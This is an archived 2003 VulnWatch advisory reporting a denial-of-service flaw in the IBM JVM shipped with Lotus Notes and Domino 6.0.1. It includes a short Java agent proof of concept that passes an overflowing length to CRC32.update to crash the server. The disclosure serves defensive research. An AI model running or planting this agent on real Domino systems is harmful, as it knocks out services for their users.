[VulnWatch] Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd)
From: Marc Schoenefeld (schonef@uni-muenster.de)
Date: 04/06/03
- Previous message: Frog Man: "[VulnWatch] PY-Membres 4.0 (PHP)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sun, 6 Apr 2003 23:11:27 +0200 (MES) From: Marc Schoenefeld <schonef@uni-muenster.de> To: vulnwatch@vulnwatch.org
Hi,
the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1
and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory
is not freed and causes the server machine (observed on MS XP) to
freeze and deny further service.
IMPLICATIONS
- If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
- if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.
ANALYSIS:
The call to the "update" method of the CRC32 raises an integer overflow
in the java java.util.zip.* core libraries which triggers a jni routine
that cannot handle the extreme high input value.
HISTORY:
This vulnerability has already been detected in the Sun JDK
(http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
and was disclosed at Blackhat Windows 2003.
The background of this bugs is described at www.illegalaccess.org
Sincerely
Marc Schoenefeld
=========================Agent Source Code===========================
import lotus.domino.*;
import java.util.zip.*;
public class JavaAgent extends AgentBase {
public void NotesMain() {
try {
Session session = getSession();
AgentContext agentContext =
session.getAgentContext();
CRC32 crc32 = new CRC32();
crc32.update(new byte[0], 4, 0x7ffffffc);
// (Your code goes here)
} catch(Exception e) {
e.printStackTrace();
}
}
}
=========================Agent Source Code===========================
-- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer [ PGP Signature ok - Sun Apr 6 23:10:07 MES 2003 ]
- Previous message: Frog Man: "[VulnWatch] PY-Membres 4.0 (PHP)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
